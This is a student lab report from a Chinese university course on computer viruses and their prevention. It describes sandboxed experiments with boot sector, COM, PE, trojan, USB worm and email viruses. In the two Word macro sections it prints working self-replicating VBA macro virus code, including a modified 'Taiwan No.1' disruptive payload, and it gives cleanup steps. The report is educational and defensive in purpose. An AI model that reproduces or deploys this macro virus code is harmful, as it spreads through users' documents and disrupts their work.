计算机病毒及防治实验报告081310128王晨雨

南京航空航天大学 计算机病毒及防治 上机实验报告 学院 理学院 专业 信息与计算科学 学号 081310128 姓名 王晨雨 授课老师 薛明富 二 一六年十二月 目录目录 实验一 引导型病毒实验 3 实验二 Com 病毒实验 4 实验三 PE 文件格式实验 5 实验四 32 位文件型病毒实验 6 实验五 简单的木马实验 7 实验七 木马病毒清除实验 选做 8 实验八 Word 宏病毒实验 一 9 实验九 Word 宏病毒实验 二 10 实验十 Linux 脚本病毒实验 选做 11 实验十二 基于 U 盘传播的蠕虫病毒实验 12 实验十三 邮件型病毒实验 13 实验十四 Web 恶意代码实验 14 实验一 引导型病毒实验实验一 引导型病毒实验 实验目的实验目的 通过实验 了解引导区病毒的感染对象和感染特征 重点学习引导病毒的感染机制和 恢复感染病毒文件的方法 提高汇编语言的使用能力 实验内容 引导阶段病毒由软盘感染硬盘实验 通过触发病毒 观察病毒发作的现象和步骤 学 习病毒的感染机制 阅读和分析病毒的代码 DOS 运行时病毒由硬盘感染软盘的实现 通过触发病毒 观察病毒发作的现象和步骤 学习病毒的感染机制 阅读和分析病毒的代码 实验平台实验平台 VMWare Workstation 12 PRO MS DOS 7 10 试验内容试验内容 第一步 环境安装 安装虚拟机 VMWare 在虚拟机环境内安装 MS DOS 7 10 环境 第二步 软盘感染硬盘 1 运行虚拟机 检查目前虚拟硬盘是否含有病毒 图 1 表示没有病毒正常启动硬盘 的状态 2 在附书资源中复制含有病毒的虚拟软盘 virus img 3 将含有病毒的软盘插入虚拟机引导 可以看到闪动的字符 如图 2 所示 按 任意键进入图 3 第三步 验证硬盘已经被感染 1 取出虚拟软盘 通过硬盘引导 再次出现了病毒的画面如图 4 2 按任意键后正常引导了 DOS 系统如图 5 可见 硬盘已被感染 第四步 硬盘感染软盘 1 下载 empty img 并且将它插入虚拟机 启动计算机 由于该盘为空 如图 6 2 取出虚拟软盘 从硬盘启动 通过命令 format A q 快速格式化软盘 可能提示 出错 这时只要按 R 键即可 如图 7 3 成功格式化后的结果如图 8 4 不要取出虚拟软盘 重新启动虚拟机 这时是从 empty img 引导 可以看到病毒 的画面 如图 9 按任意键进入图 10 可见 病毒已经成功由硬盘传染给了软盘 实验截图 实验截图 1 软盘启动后 2 硬盘启动后 实验二 实验二 Com 病毒实验病毒实验 实验目的实验目的 1 掌握 COM 病毒的传播原理 2 掌握 MASM611 编译工具的使用 实验平台实验平台 1 MS DOS 7 10 2 MASM611 试验内容试验内容 1 安装 MS DOS 7 10 环境 虚拟机安装该环境亦可 步骤在此不再赘述 2 在 MS DOS C MASM 目录下安装 MASM611 然后将 binr 目录下的 link exe 复制到 bin 目录下 3 在 com 目录下复制病毒程序 Virus asm 及测试程序源代码 BeInfected asm 4 编译链接 BeInfected asm 形成 BeInfectedcom 测试程序 5 编译链接 virus asm 生成病毒程序 virus exe 6 在 C MASM Bin 目录下建立 del txt 文件 并且将 和病毒代码 2 virus asm 复制到此目录下 7 执行 观察结果 8 编译并连接 virus asm 生成 virus exe 执行此 exe 文件以感染 文件并且自动删除 del txt 而后执行 可以发现感染后的结果 实验截图 实验截图 1 编译存储好文件 2 Dos 下查看文件夹内容 3 查看 TEST 的内容 4 运行病毒程序 5 查看感染病毒后文件夹内容 6 查看感染病毒后 TEST 的内容 实验三 实验三 PE 文件格式实验文件格式实验 实验目的实验目的 了解 PE 文件基本结构 实验环境实验环境 运行环境 Windows 2000 Windows 9x Windows NT 以及 Windows XP 编译环境 Visual Studio 6 0 实验步骤实验步骤 使用编译环境打开源代码工程 编译后可以生成 winpe exe 预备步骤 找任意一个 Win32 下的 Exe 文件作为查看对象 实验内容 运行 winpe exe 并打开任一 exe 文件 选择不同的菜单 可以查看到 exe 文 件的内部结构 实验截图 实验截图 感染前感染前 感染后感染后 第一处 第二处 第三处 第四处 第五处 感染前 感染后 实验四 实验四 32 位文件型病毒实验位文件型病毒实验 实验目的实验目的 了解文件型病毒的基本制造过程 了解病毒的感染 破坏机制 进一步认识病毒程序 掌握文件型病毒的特征和内在机制 实验环境实验环境 运行环境 Windows 2000 Windows 9x Windows NT 和 Windows XP 实验步骤实验步骤 目录中的 virus rar 包中包括 Virus exe 编译的病毒程序 软件使用说明书 doc 请 仔细阅读 源代码详解 doc 对代码部分加入了部分注释 以及 pll asm 程序源代码 Example rar 包中选取的是一个常用程序 ebookedit 安装后的安装目录下的程序 用于测 试病毒程序 预备步骤 将 example rar 解压到某个目录 解压完毕后 应该在该目录下有 Buttons 目录 ebookcode exe ebookedit exe ebrand it exe 以及 keymaker exe 等程 序 然后把 virus rar 包解压后的 Virus exe 复制到该目录中 实验内容 通过运行病毒程序观看各步的提示以了解病毒的内在机制 实验截图 实验截图 1 感染前准备 2 感染过程 3 感染后 4 感染文件比对 实验五 简单的木马实验实验五 简单的木马实验 实验目的实验目的 掌握木马的基本原理 实验环境实验环境 Windows XP 操作系统 Visual Studio 6 0 编程环境 实验步骤实验步骤 1 复制实验文件到实验的计算机上 其中 SocketListener 目录下是木马 Server 端 源代码 SocketCommand 目录下是木马 Client 端源代码 2 用 Visual Studio 6 0 环境分别编译这两部分代码 3 运行 SocketListener 应用程序 也就是启动了木马被控端 4 运行 SocketCommand 应用程序 也就是启动了木马的控制端 可以在控制端执行命 令来控制被控制端 实验支持的命令参考表 命令命令命令含义命令含义 CMD 执行应用程序 SHUT 退出木马 FILEGET 获得远程文件 EDITCONF 编辑配置文件 LIST 列目录 VIEW 查看文件内容 CDOPEN 关 CD CDCLOSE 开 CD REBOOT 重启远端计算机 实验截图 实验截图 1 建立连接 2 发送指令及成功后结果 1 运行程序 2 关闭木马 3 获得文件 4 编辑配置文件 5 查看文件 6 查看文件内容 7 重启计算机 实验七 木马病毒清除实验 选做 实验七 木马病毒清除实验 选做 实验目的实验目的 掌握木马病毒清除的基本原理 实验平台实验平台 Windows 32 位操作系统 Visual Studio 7 0 编译环境 实验步骤实验步骤 文件 Antitrojan sln 为工程文件 使用 Visual Studio 编译该工程 生成 Antitrojan exe 可执行程序 执行 Antitrojan exe 观察执行效果 实验截图 实验截图 1 确认木马存在 2 进行编译 1 修改试验机名字 2 添加查杀代号 3 添加查杀代码 3 清除成功 实验八 实验八 Word 宏病毒实验 一 宏病毒实验 一 实验目的实验目的 Word 宏是指能组织到一起为独立命令使用的一系列 Word 指令 它能使日常工作变得 容易 本实验演示了宏的编写 通过两个简单的宏病毒示例 说明宏的原理及其安全漏洞 和缺陷 理解宏病毒的作用机制 从而加强对宏病毒的认识 提高防范意识 实验所需条件和环境实验所需条件和环境 硬件设备 局域网 终端 PC 机 系统软件 Windows 系列操作系统 支撑软件 Word 2003 软件设置 关闭杀毒软 打开 Word 2003 在工具 宏 安全性中 将安全级别设置为低 在可靠发行商选项卡中 选择信任任何所有安装的加载项和模板 选择信任 visual basic 项目的访问 实验环境配置如下图所示 受感染终端 受感染 Word文档 被感染终端 宏病毒传播示意图 实验内容和分析实验内容和分析 为了保证该实验不至于造成较大的破坏性 进行实验感染后 被感染终端不要打开过 多的 word 文档 否则清除比较麻烦 对每个打开过的文档都要清除 例例 1 自我复制 感染自我复制 感染 word 公用模板和当前文档公用模板和当前文档 代码如下 Micro Virus Sub Document Open On Error Resume Next Application DisplayStatusBar False Options SaveNormalPrompt False Ourcode ThisDocument VBProject VBComponents 1 CodeModule Lines 1 100 Set Host NormalTemplate VBProject VBComponents 1 CodeModule If ThisDocument NormalTemplate Then Set Host ActiveDocument VBProject VBComponents 1 CodeModule End If With Host If Lines 1 1 Micro Virus Then DeleteLines 1 CountOfLines InsertLines 1 Ourcode ReplaceLine 2 Sub Document Close If ThisDocument nomaltemplate Then ReplaceLine 2 Sub Document Open ActiveDocument SaveAs ActiveDocument FullName End If End If End With MsgBox MicroVirus by Content Security Lab End Sub 打开一个 word 文档 然后按 Alt F11 调用宏编写窗口 工具 宏 Visual Basic 宏 编辑器 在左侧的 project Microsoft Word 对象 ThisDocument 中输入以上代码 保 存 此时当前 word 文档就含有宏病毒 只要下次打开这个 word 文档 就会执行以上代码 并将自身复制到 Normal dot word 文档的公共模板 和当前文档的 ThisDocument 中 同 时改变函数名 模板中为 Document Close 当前文档为 Document Open 此时所有的 word 文档打开和关闭时 都将运行以上的病毒代码 可以加入适当的恶意代码 影响 word 的正常使用 本例中只是简单的跳出一个提示框 代码解释代码解释 以上代码的基本执行流程如下 1 进行必要的自我保护 Application DisplayStatusBar False Options SaveNormalPrompt False 高明的病毒编写者其自我保护将做得非常好 可以使 word 的一些工具栏失效 例如将 工具菜单中的宏选项屏蔽 也可以修改注册表达到很好的隐藏效果 本例中只是屏蔽状态栏 以免显示宏的运行状态 并且修改公用模板时自动保存 不 给用户提示 2 得到当前文档的代码对象和公用模板的代码对象 Ourcode ThisDocument VBProject VBComponents 1 CodeModule Lines 1 100 Set Host NormalTemplate VBProject VBComponents 1 CodeModule If ThisDocument NormalTemplate Then Set Host ActiveDocument VBProject VBComponents 1 CodeModule End If 3 检查模板是否已经感染病毒 如果没有 则复制宏病毒代码到模板 并且修改函数名 With Host If Lines 1 1 Micro Virus Then DeleteLines 1 CountOfLines InsertLines 1 Ourcode ReplaceLine 2 Sub Document Close If ThisDocument nomaltemplate Then ReplaceLine 2 Sub Document Open ActiveDocument SaveAs ActiveDocument FullName End If End If End With 4 执行恶意代码 MsgBox MicroVirus by Content Security Lab 实验截图实验截图 1 复制代码 2 感染病毒后现象 3 感染其他文档 实验九 实验九 Word 宏病毒实验 二 宏病毒实验 二 例例 2 具有一定破坏性的宏具有一定破坏性的宏 我们可以对上例中的恶意代码稍加修改 使其具有一定的破坏性 这里以著名宏病毒 台湾一号 的恶意代码部分为基础 为使其在 word2003 版本中运行 且降低破坏性 对 源代码作适当修改 完整代码如下 moonlight Dim nm 4 Sub Document Open DisableInput 1 Set ourcodemodule ThisDocument VBProject VBComponents 1 CodeModule Set host NormalTemplate VBProject VBComponents 1 CodeModule If ThisDocument NormalTemplate Then Set host ActiveDocument VBProject VBComponents 1 CodeModule End If With host If Lines 1 1 moonlight Then DeleteLines 1 CountOfLines InsertLines 1 ourcodemodule Lines 1 100 ReplaceLine 3 Sub Document Close If ThisDocument NormalTemplate Then ReplaceLine 3 Sub Document Open ActiveDocument SaveAs ActiveDocument FullName End If End If End With Count 0 If Day Now 1 Then try On Error GoTo try test 1 con 1 tog i 0 While test 1 For i 0 To 4 nm i Int Rnd 10 con con nm i If i 4 Then tog tog Str nm 4 GoTo beg End If tog tog Str nm i Next i beg Beep ans InputBox 今天是 Date 跟你玩一个心算游戏 Chr 13 若你答错 只好接受震撼教育 Chr 13 tog 台湾 NO 1 Macro Virus If RTrim LTrim ans LTrim Str con Then Documents Add Selection Paragraphs Alignment wdAlignParagraphCenter Beep With Selection Font Name 细明体 Size 16 Bold 1 Underline 1 End With Selection InsertAfter Text 何谓宏病毒 Selection InsertParagraphAfter Beep Selection InsertAfter Text 答案 Selection Font Italic 1 Selection InsertAfter Text 我就是 Selection InsertParagraphAfter Selection InsertParagraphAfter Selection Font Italic 0 Beep Selection InsertAfter Text 如何预防宏病毒 Selection InsertParagraphAfter Beep Selection InsertAfter Text 答案 Selection Font Italic 1 Selection InsertAfter Text 不要看我 GoTo out Else Count Count 1 For j 1 To 20 Beep Documents Add Next j Selection Paragraphs Alignment wdAlignParagraphCenter Selection InsertAfter Text 宏病毒 If Count 2 Then GoTo out GoTo try End If Wend End If out End Sub 该病毒的效果如下 当打开被感染的 word 文档时 首先进行自我复制 感染 word 模 板 然后检查日期 看是否是 1 日 即在每月的 1 日会发作 然后跳出一个对话框 要求 用户进行一次心算游戏 这里只用四个小于 10 的数相乘 如果作者的计算正确 那么就会 新建一个文档 跳出如下字幕 何谓宏病毒何谓宏病毒 答案 我就是答案 我就是 如何预防宏病毒如何预防宏病毒 答案 不要看我答案 不要看我 如果计算错误 新建 20 个写有 宏病毒 字样的 word 文档 然后再一次进行心算游戏 总共进行 3 次 然后跳出程序 关闭文档的时候也会执行同样的询问 清除宏病毒清除宏病毒 对每一个受感染的 word 文档进行如下操作 打开受感染的 word 文档 进入宏编辑环境 Alt F11 打开 Normal Microsoft Word 对象 This Document 清除其中的病毒代码 只要删除所有内容即可 然后打开 Project Microsoft Word This Document 清除其中的病毒代码 实际上 模板的病毒代码只要在处理最后一个受感染文件时清除即可 然而清除模板 病毒后 如果重新打开其他已感染文件 模板将再次被感染 因此为了保证病毒被清除 可以查看每一个受感染文档的模板 如果存在病毒代码 都进行一次清除 实验截图 实验截图 1 复制代码 2 感染现象 实验十 实验十 Linux 脚本病毒实验 选做 脚本病毒实验 选做 实验十二 基于实验十二 基于 U 盘传播的蠕虫病毒实验盘传播的蠕虫病毒实验 实验目的实验目的 理解 U 盘蠕虫病毒的传染原理 实验环境实验环境 VMWare Workstation 5 5 3 Windows XP SP2 实验步骤实验步骤 1 实验素材 在附书资源目录 Experiment wormu 下 2 检查干净的电脑各分区是否存在 autorun inf 和病毒文件 virus exe 3 插入含有病毒的 U 盘 U 盘的右键菜单出现 auto 后 双击 U 盘 观察现在各个分 区的情况 4 查看 autorun inf 文件内容 5 观察病毒触发后的效果 6 插入干净的 U 盘 观察 U 盘是否被感染 实验注意事项实验注意事项 1 实验前 请关闭杀毒软件 否则病毒样本会被自动杀除 2 请注意操作系统的版本 Windows XP SP2 及以下版本都适用 实验截图 实验截图 1 编译后生成 2 运行效果 实验十三 邮件型病毒实验实验十三 邮件型病毒实验 实验目的实验目的 掌握邮件型病毒基本原理 实验环境实验环境 Windows XP 操作系统 Outlook 邮件客户端 实验步骤实验步骤 7 在 Outlook 中设置用户账号 8 在 Outlook 地址簿中添加联系人 9 在实验的计算机上的 C 根目录下创建空文件 test vbs 10 关闭反病毒软件的实时防护功能 11 把实验代码录入到 test vbs 文件里 12 运行脚本文件 程序启动 Outlook 由于现在的 Outlook 版本较